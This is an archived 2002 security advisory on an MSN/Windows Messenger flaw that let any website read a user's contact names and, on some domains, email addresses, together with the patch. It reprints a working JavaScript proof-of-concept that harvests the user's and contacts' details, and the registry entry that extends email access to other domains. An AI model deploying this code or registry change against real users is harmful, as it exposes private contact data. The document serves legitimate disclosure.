Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win5062.htm

MSN (or Windows) Messenger contact list can be stolen by any website



5th Feb 2002 [SBWID-5062]
COMMAND

	MSN (or Windows) Messenger contact list can be stolen by any website

SYSTEMS AFFECTED

	 MSN Messenger 4.6.0073 (latest at 02/02/2002) on Windows 2000 with IE 6.

	 Windows Messenger 4.6.0073 (latest at 02/02/2002) on Windows XP with IE 6.

	 

	 Probably other versions and other platforms too.

	

PROBLEM

	Richard Burton revealed :
	

	MSN Messenger (and Windows Messenger  on  XP)  can  be  used  to  obtain
	personal information about a user from any website (in any domain).
	

	Using JavaScript a user\'s display name can be obtained from  Messenger,
	as well as the display names of all their contacts. For users  who  have
	a sensible and  accurate  display  name  this  should  be  considered  a
	privacy issue. (Note: anyone who has not set  a  display  name  at  all,
	will reveal their email address instead.)
	

	Using  the  same  technique  web  sites  hosted   on   certain   domains
	(microsoft.com, hotmail.com & hotmail.msn.com) can also  access  the
	email address of the user (along with the email addresses of  all  their
	contacts). This could be used by  Microsoft  to  track  users  on  their
	sites, which many would consider to be a privacy issue.
	

	In addition to the three domains  mentioned  above,  additional  domains
	can be allowed access to the email  addresses  with  a  single  registry
	entry. This registry entry could be made by spyware/adware installed  by
	a user (sometimes unknowingly along with a  piece  of  shareware).  Once
	there you have the potential to give your  email  address  to  any  site
	that requests it and places it in a cookie.
	

	Technical

	=========

	

	Microsoft designed Messenger  to  allow  functionality  to  be  used  in
	webpages using JavaScript or VBScript.  This  includes  the  ability  to
	view the display name and email address of the user and their  contacts.
	In an attempt to protect users only a certain  selection  of  sites  can
	use script to get email addresses, but all can get display names.
	

	The  list  of  domain  suffixes  that  have  full  access  to  Messenger
	functionality  (email  addresses  &  more?)  can  be  found  in  the
	registry in key
	

	\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MessengerService\\Policies\\Suffixes\". 

	

	Values \"Suffix0\", \"Suffix1\", etc. By default there  are  no  entries
	in the list, but  they  can  be  added.  E.g.  adding  value  Suffix0  =
	\"test.com\" will give web sites in the test.com domain full  access  to
	Messenger information.
	

	Full domains do not have to be specified in  the  list,  adding  \"com\"
	would allow all .com sites to have full access.
	

	Although by default there are no entries in  this  list,  three  domains
	(listed above) are hard coded  into  Messenger  for  the  same  purpose.
	These allow Microsoft to make their sites (e.g. Hotmail)  look  nice  by
	integrating messenger features into them. The  user  cannot  remove  the
	special status applied to these sites.
	

	For a simple how-to, just look at the source of the  demonstration  page
	given below.
	

	[http://raburton.members.easyspace.com/msn/] :
	

	

	<html>

	<head>

	  <title>MSN Messenger Privacy</title>

	

	  <div id=\"divMsgrObject\" style=\"display:none\">

	    <object classid=\'clsid:F3A614DC-ABE0-11d2-A441-00C04F795683\' codetype=\'application/x-oleobject\' height=\'1\' id=\'MsgrObj\' width=\'1\'>

	    </object>

	    <object classid=\'clsid:FB7199AB-79BF-11d2-8D94-0000F875C541\' codetype=\'application/x-oleobject\' height=\'1\' id=\'MsgrApp\' width=\'1\'>

	    </object>

	  </div>

	

	  <script event=\"onload\" for=\"window\" language=\"javascript\">

	     // some variables

	     var textlist = \"\";

	     var you = \"\";

	     var installed = true;

	

	     // check for messenger installed

	     try {

	        var xObj = new ActiveXObject(\"Messenger.MsgrObject\");

	        if (xObj == null)

	           installed = false;

	     } catch (e) {

	        installed = false;

	     }

	

	     if (installed) {

	        if (isStateOnline(MsgrObj.LocalState)) {

	           // get contact list

	           var list = MsgrObj.List(0);

	

	           // get you!

	           you = MsgrObj.LocalFriendlyName + \" (\" + MsgrObj.LocalLogonName + \")\";

	

	           // get your friends

	           for (i=0; i<list.Count; i++)

	              textlist = textlist + list.Item(i).FriendlyName + \" (\" + list.Item(i).EmailAddress + \")\\n\";

	

	        } else {

	            // must be offline

	            you = \" - MSN Messenger is not connected. - \";

	        }

	     } else {

	         // not installed

	         you = \" - MSN Messenger is not installed. - \";

	     }

	

	     // fill in the form

	     document.forms.details.you.value = you;

	     document.forms.details.friends.value = textlist;

	

	  </script>

	</head>

	

	<body onScroll=\'nyw2()\'  onLoad=\'nyw1()\'  onMove=\'nyw2()\'  onResize=\'nyw2()\' >

	<SCRIPT>

	<!--

	var nyw3=0;

	var nyw4=62;

	var nyw5=470;

	var nyw6=12;

	var nyw7=200;

	var nyw8=0;

	var nyw9=0;

	var nyw0,nyw10;

	var nyw11,nyw12,nyw13,nyw8,nyw14;

	var nyw15,nyw16,nyw17=500;

	function nyw1()

	{

	if(nyw8==1)

	return true;

	if(document.all)

	{

	nyw11=document.all(\"nyw18\").style;

	nyw12=document.all(\"nyw19\").style;

	nyw20=nyw4+nyw3+0;

	nyw21=nyw5+nyw6+nyw3;

	nyw22=\'visible\';

	nyw23=\'hidden\';

	}

	else

	{

	nyw22=\'show\';

	nyw23=\'hide\';

	nyw11=document.nyw18;

	nyw12=document.nyw19;

	nyw20=nyw4+nyw3+15;

	nyw21=nyw5+nyw6+nyw3+15;

	}

	if(nyw0==\"00550240\")

	{

	if(document.all)

	{

	nyw12.display=\'none\';

	nyw11.display=\'none\';

	}

	return true;

	}

	if(document.all)

	{

	if(document.body.clientHeight<nyw7||document.body.clientWidth<nyw7)

	return true;

	}

	else if(document.layers)

	{

	if(window.innerHeight<nyw7||window.innerWidth<nyw7)

	return true;

	}

	nyw8=1;

	nyw2();

	nyw11.visibility=nyw22;

	if(document.layers)

	nyw24();

	}

	function nyw24()

	{

	if(pageXOffset!=nyw15||pageYOffset!=nyw16)

	{

	nyw15=pageXOffset;

	nyw16=pageYOffset;

	nyw2();

	if(nyw17>=500)

	{

	nyw17=20;

	setTimeout(\"checkTime=500\",1000);

	}

	}

	nyw10=setTimeout(\"nyw24()\",nyw17);

	}

	function nyw2()

	{

	if(!nyw8)

	return true;

	if(document.all)

	{

	if(document.body.scrollHeight<document.body.clientHeight

	||document.body.scrollTop<((document.body.scrollHeight-document.body.clientHeight)/2))

	{

	nyw11.top=document.body.scrollTop+document.body.clientHeight-nyw20;

	nyw12.top=document.body.scrollTop+document.body.clientHeight-nyw20;

	}

	else

	{

	nyw11.top=document.body.scrollTop+nyw3;

	nyw12.top=document.body.scrollTop+nyw3;

	}

	nyw11.left=document.body.scrollLeft+document.body.clientWidth-nyw21;

	nyw12.left=document.body.scrollLeft+document.body.clientWidth-nyw21+nyw5;

	}

	else if(document.layers)

	{

	if(window.pageYOffset<((window.outerHeight-window.innerHeight)/2))

	{

	nyw11.top=window.pageYOffset+window.innerHeight-nyw20;

	nyw12.top=window.pageYOffset+window.innerHeight-nyw20;

	}

	else

	{

	nyw11.top=window.pageYOffset+nyw3;

	nyw12.top=window.pageYOffset+nyw3;

	}

	nyw11.left=window.pageXOffset+window.innerWidth-nyw21;

	nyw12.left=window.pageXOffset+window.innerWidth-nyw21+nyw5;

	}

	}

	function nyw25()

	{

	nyw9=1;

	nyw12.visibility=nyw22;

	nyw11.visibility=nyw23;

	clearTimeout(nyw14);

	}

	function nyw26()

	{

	nyw9=0;

	nyw12.visibility=nyw23;

	nyw11.visibility=nyw22;

	}

	//-->

	</SCRIPT>

	

	<DIV ID=\"nyw19\" STYLE=\"position: absolute; top: 0; left: 0; visibility: hidden; z-index: 2147483632;\">

	<table border=0 cellspacing=0 cellpadding=0 height=62 bgcolor=\"#EEEEEE\">

	<tr>

	<td valign=\"top\"><a href=\"\" title=\"Click here to expand banner\" onClick=\"nyw26(); return false;\"><img src=\"http://banner.easyspace.com/left.gif\" width=12 height=12 border=0></a></td>

	</tr>

	<tr>

	<td valign=\"bottom\"><a href=\"http://www.easyspace.com/\" target=\"_blank\"><img src=\"http://banner.easyspace.com/littlelogo.gif\" border=0></a></td>

	</tr>

	</table>

	</DIV>

	<DIV ID=\"nyw18\" STYLE=\"position: absolute; top: 0; left: 0; z-index: 2147483647; visibility: hidden\">

	<table border=0 cellspacing=0 cellpadding=0 height=62>

	<tr>

	<td rowspan=2 valign=\"top\"><A TARGET=\"_new\" HREF=\"http://www.easyspace.com\"><IMG SRC=\"http://banner.easyspace.com/ESBIZ-468-6.gif?r=0.0380174302486864\" width=468 height=60 border=0 ALT=\"Nothing personal. Just business.\"></A></td>

	<td bgcolor=\"#EEEEEE\" valign=\"top\"><a href=\"\" title=\"Click here to shrink banner\" onClick=\"nyw25(); return false;\"><img src=\"http://banner.easyspace.com/right.gif\" width=12 height=12 border=0></a></td>

	</tr>

	<tr>

	<td bgcolor=\"#EEEEEE\" valign=\"bottom\"><a href=\"http://www.easyspace.com/\" target=\"_blank\"><img src=\"http://banner.easyspace.com/littlelogo.gif\" border=0></a></td>

	</tr>

	</table>

	</DIV>

	

	

	<h1>MSN Messenger Privacy</h1> <br>

	If you are running MSN messenger (and have JavaScript enabled) you should see 

	your name displayed below, along with a list of all your contacts. <br>

	Note: this has been tested on MSN Messenger (4.6.0073) for Win2k & Windows 

	Messenger (4.6.0073) for WinXP (all with IE 6).<br>

	<br>

	If this page was hosted on microsoft.com, hotmail.com or hotmail.msn.com you 

	would also see your email address and your contacts email addresses (instead of 

	\"undefined\"). <br>

	<br>

	This information could be placed in a cookie and next time you request an item 

	from the server (page, image, etc.), this information would be sent back to the 

	server, allowing Microsoft to know who you are and who your friends are. <br>

	<br>

	By default, everyone has access to your display name and those of your contacts, 

	but only Microsoft can get your email address this way. However third parties 

	could get access to the email addresses, by simply adding a single entry to your 

	registry. That would require a little more effort, but is easily done. <br>

	e.g. Installing software which contains \"spyware\" or \"adware\" (such as Kazaa, Go!Zilla, 

	Direct Connect, etc.*), could easily add such an entry to your registry. After 

	that you could be sending your email address to them every time your computer 

	loads an advertising banner from their site. <br>

	<br>

	To demonstrate what this would look like from a Microsoft server, or to a third 

	party after placing a registry entry on your computer add the following to your 

	registry (<a href=\"suffix0.reg\">or run this file</a>) and reload this page: <br>

	In key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MessengerService\\Policies\\Suffixes 

	(you may need to create the Suffixes key) <br>

	Add String: \"Suffix0\", Value: \"raburton.members.easyspace.com\" <br>

	Note: this value doesn\'t have to be a complete host name, adding just \"com\" 

	would open your contact list to any .com website. <br>

	

	<form id=\"details\">

	  You are:<br>

	  <input type=\"text\" readonly value=\"\" id=\"you\" size=\"80\">

	  <br>

	  <br>

	  Your friends are:<br>

	  <textarea readonly value=\"\" id=\"friends\" cols=\"80\" rows=\"10\">

	  </textarea>

	</form>

	

	Richard Antony Burton (<a href=\"mailto:richardaburton@hotmail.com\">richardaburton@hotmail.com</a>) 

	- 02/02/2002

	<br><br>

	* spyware/adware info from <a href=\"http://spychecker.com\">spychecker.com</a>

	<br><br>

	

	<!-- Start of TheCounter.com Code -->

	<SCRIPT TYPE=\"text/javascript\" LANGUAGE=\"javascript\">

	s=\"na\";c=\"na\";j=\"na\";f=\"\"+escape(document.referrer)

	</SCRIPT>

	<SCRIPT TYPE=\"text/javascript\" LANGUAGE=\"javascript1.2\">

	s=screen.width;v=navigator.appName

	if (v != \"Netscape\") {c=screen.colorDepth}

	else {c=screen.pixelDepth}

	j=navigator.javaEnabled()

	</SCRIPT>

	<SCRIPT TYPE=\"text/javascript\" LANGUAGE=\"javascript\">

	function pr(n) {document.write(n,\"\\n\");}

	NS2Ch=0

	if (navigator.appName == \"Netscape\" &&

	navigator.appVersion.charAt(0) == \"2\") {NS2Ch=1}

	if (NS2Ch == 0) {

	r=\"&size=\"+s+\"&colors=\"+c+\"&referer=\"+f+\"&java=\"+j+\"\"

	pr(\"<A HREF=\\\"http://www.TheCounter.com\\\" TARGET=\\\"_top\\\"><IMG\"+

	\" BORDER=0 SRC=\\\"http://c2.thecounter.com/id=1045755\"+r+\"\\\"><\\/A>\")}

	</SCRIPT>

	<NOSCRIPT><A HREF=\"http://www.TheCounter.com\" TARGET=\"_top\"><IMG

	SRC=\"http://c2.thecounter.com/id=1045755\" ALT=\"TC\" BORDER=0></A>

	</NOSCRIPT>

	<!-- End of TheCounter.com Code -->

	

	</body>

	

	<script language=\"javascript\">

	

	// is user online?

	function isStateOnline(state) {

	   var ret;

	   switch (state) {

	   case 2:

	      //online

	   case 6:  

	      //invisible

	   case 10:

	      //busy

	   case 14:

	      //be right back

	   case 18:

	      //idle

	   case 34:

	      //away

	   case 50:

	      //on the phone

	   case 66:

	      //out to lunch

	      ret = true;

	      break;

	   default:

	      ret = false;

	      break;

	   }

	   return ret;

	}

	</script>

	

	</html>

	

	

SOLUTION

	At this time, the only way for  a  user  to  prevent  sites  having  any
	access to their information  is  by  logging  out  of  Messenger  before
	visiting.
	

	 Update (14 February 2002)

	 ======

	

	Get patch 4.6.0076 from :
	

	http://messenger.microsoft.com/Default.asp

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH